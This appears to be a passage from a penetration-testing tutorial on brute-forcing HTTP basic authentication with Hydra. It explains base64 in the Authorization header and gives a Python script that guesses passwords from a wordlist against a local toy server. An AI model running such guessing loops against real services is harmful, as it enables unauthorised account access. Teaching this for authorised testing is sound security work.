Brute forcing basic authentication with Hydra

THC Hydra (or simply Hydra) is a network online logon cracker; this means it can be used to find login passwords by brute forcing active network services. Among the many services Hydra supports, we can find HTTP form login and HTTP basic authentication.

In HTTP basic authentication, the browser sends the username and password, joined by a colon and base64-encoded, in the Authorization header. For example, if the username is admin and the password is Password, the browser encodes admin:Password, which gives the string YWRtaW46UGFzc3dvcmQ=, and the request carries a header line such as this:

Authorization: Basic YWRtaW46UGFzc3dvcmQ=

Base64 is an encoding, not encryption: anyone who can read the request, for instance on a plain HTTP connection, recovers the password with a single decode. Almost every time we see a seemingly random alphanumeric string ending in one or two equals (=) signs, that string is base64 encoded, and we can decode it with Burp Suite's Decoder or the base64 command in Kali Linux. Because = is a reserved character in URLs, it may appear URL-encoded as %3D in some requests and responses; restore the = before decoding.
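As an added example (not code from the book or from the Hydra project), the following Python script shows what an online basic-authentication brute force does under the hood: it builds and decodes Authorization header values, including the %3D form of = and a token with its padding stripped, starts a throwaway local HTTP server protected by constructed credentials (admin / Password, as in the text), and tries a constructed wordlist until the server stops answering 401. The server, the wordlist and the helper names are assumptions for illustration only; Hydra runs the same loop far faster and in parallel.

```python
"""Added example: the mechanics of an online HTTP basic-auth brute force.
Not Hydra's code; a local stand-in so the exchange can be observed offline."""
import base64
import binascii
import http.server
import threading
import urllib.error
import urllib.parse
import urllib.request
from typing import Iterable, Optional, Tuple

# Constructed credentials protecting the toy server (assumption, not from the page).
TARGET_REALM = "Restricted"
VALID_USER = "admin"
VALID_PASS = "Password"


def encode_basic(username: str, password: str) -> str:
    """Build the Authorization header value exactly as a browser does."""
    raw = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def decode_basic(header_value: str) -> Optional[Tuple[str, str]]:
    """Recover (username, password) from an Authorization header value.

    Accepts the %3D form of '=' and restores padding if it was stripped.
    Returns None for anything that is not well-formed basic auth."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    token = urllib.parse.unquote(token)        # %3D -> =
    token += "=" * (-len(token) % 4)           # put padding back if it was dropped
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, pwd = raw.partition(":")        # password itself may contain ':'
    return (user, pwd) if sep else None


class BasicAuthHandler(http.server.BaseHTTPRequestHandler):
    """Minimal server that protects every path with HTTP basic authentication."""

    def do_GET(self) -> None:
        creds = decode_basic(self.headers.get("Authorization", ""))
        if creds == (VALID_USER, VALID_PASS):
            body = b"welcome\n"
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            # 401 plus a challenge is what a browser turns into the login pop-up.
            self.send_response(401)
            self.send_header("WWW-Authenticate", f'Basic realm="{TARGET_REALM}"')
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *args) -> None:  # keep the demo quiet
        pass


def brute_force_basic(url: str, username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate password against url; return the first one accepted.

    The oracle is the status code: 401 means 'wrong', 200 means 'right'.
    Any other code is unexpected (lockout, WAF, outage) and aborts the run."""
    for candidate in wordlist:
        req = urllib.request.Request(
            url, headers={"Authorization": encode_basic(username, candidate)}
        )
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                if resp.status == 200:
                    return candidate
        except urllib.error.HTTPError as err:
            if err.code != 401:
                raise
    return None


def run_demo() -> Optional[str]:
    """Start the toy server on an ephemeral port, attack it, shut it down."""
    server = http.server.HTTPServer(("127.0.0.1", 0), BasicAuthHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        # Constructed wordlist; the valid password sits in the middle.
        wordlist = ["123456", "password", "admin", "Password", "letmein"]
        return brute_force_basic(f"http://127.0.0.1:{port}/", VALID_USER, wordlist)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("decoded header:", decode_basic("Basic YWRtaW46UGFzc3dvcmQ%3D"))
    print("password found:", run_demo())
```

The point to take from the loop is the oracle: a brute force against basic authentication is only as good as the distinction between the failure response (401) and the success response, so before launching Hydra against a real target, send one known-bad request and check that the server really answers 401 rather than, say, a 200 page saying "login failed".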

In the previous recipe, we used Burp Suite's Intruder to attack a login form; in this recipe, we will use THC Hydra to attack a different login mechanism, HTTP basic authentication.
